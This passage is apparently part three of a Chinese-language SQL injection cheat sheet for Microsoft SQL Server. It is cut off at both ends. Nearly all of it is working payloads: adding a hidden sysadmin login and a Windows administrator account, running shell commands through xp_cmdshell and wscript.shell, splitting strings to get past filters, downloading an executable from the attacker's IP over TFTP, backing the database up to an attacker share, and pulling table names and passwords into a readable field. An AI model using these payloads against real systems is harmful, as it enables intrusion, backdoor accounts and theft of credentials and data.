
常用SQL注射语句解析(3)_MySQL


aths(path)

  values(@test)--

  ;use ku1;--

  ;create table cmd (str image);-- 建立表cmd,其中str字段为image类型

  测试是否存在xp_cmdshell的过程(SQL Server 2005 及之后的版本默认禁用 xp_cmdshell,且默认只有 sysadmin 角色成员可以执行):

  ;exec master..xp_cmdshell 'dir'

  ;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号

  ;exec master.dbo.sp_password null,jiaoniang$,1866574;--

  ;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--

  ;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:*

  /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

  ;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$

  /add';--

  exec master..xp_servicecontrol 'start', 'schedule' 启动服务

  exec master..xp_servicecontrol 'start', 'server'

  ; DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

  SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net user

  jiaoniang$ 1866574 /add'

  ;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

  SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net

  localgroup administrators jiaoniang$ /add'

  '; exec master..xp_cmdshell 'tftp -i youip get file.exe'-- 利用TFTP上传文件

  ;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/'

  ;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:/'

  ;declare @a;set @a=db_name();backup database @a to

  disk='你的IP你的共享目录bak.dat'

  如果上述方法被限制,则可以改用下面的语句:

  select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec

  master.dbo.sp_addlogin hax')

  查询构造:

  Select * FROM news Where id=... AND topic=... AND .....

  admin'and 1=(select count(*) from [user] where username='victim' and

  right(left(userpass,01),1)='1') and userpass <>'

  select 123;--

  ;use master;--

  :a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。

  and 1<>(select count(email) from [user]);--

  ;update [users] set email=(select top 1 name from sysobjects where

  xtype='u' and status>0) where name='ffff';--

  ;update [users] set email=(select top 1 id from sysobjects where xtype='u'

  and name='ad') where name='ffff';--

  ';update [users] set email=(select top 1 name from sysobjects where

  xtype='u' and id>581577110) where name='ffff';--

  ';update [users] set email=(select top 1 count(id) from password) where

  name='ffff';--

  ';update [users] set email=(select top 1 pwd from password where id=2)

  where name='ffff';--

  ';update [users] set email=(select top 1 name from password where id=2)

  where name='ffff';--

  上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。

  通过查看ffff的用户资料,可得第一个用户表叫ad

  然后根据表名ad得到这个表的ID,再据此得到第二个表的名字

  insert into users values( 666,

  char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),

  char(0x63)+char(0x68)+char(0x72)+c
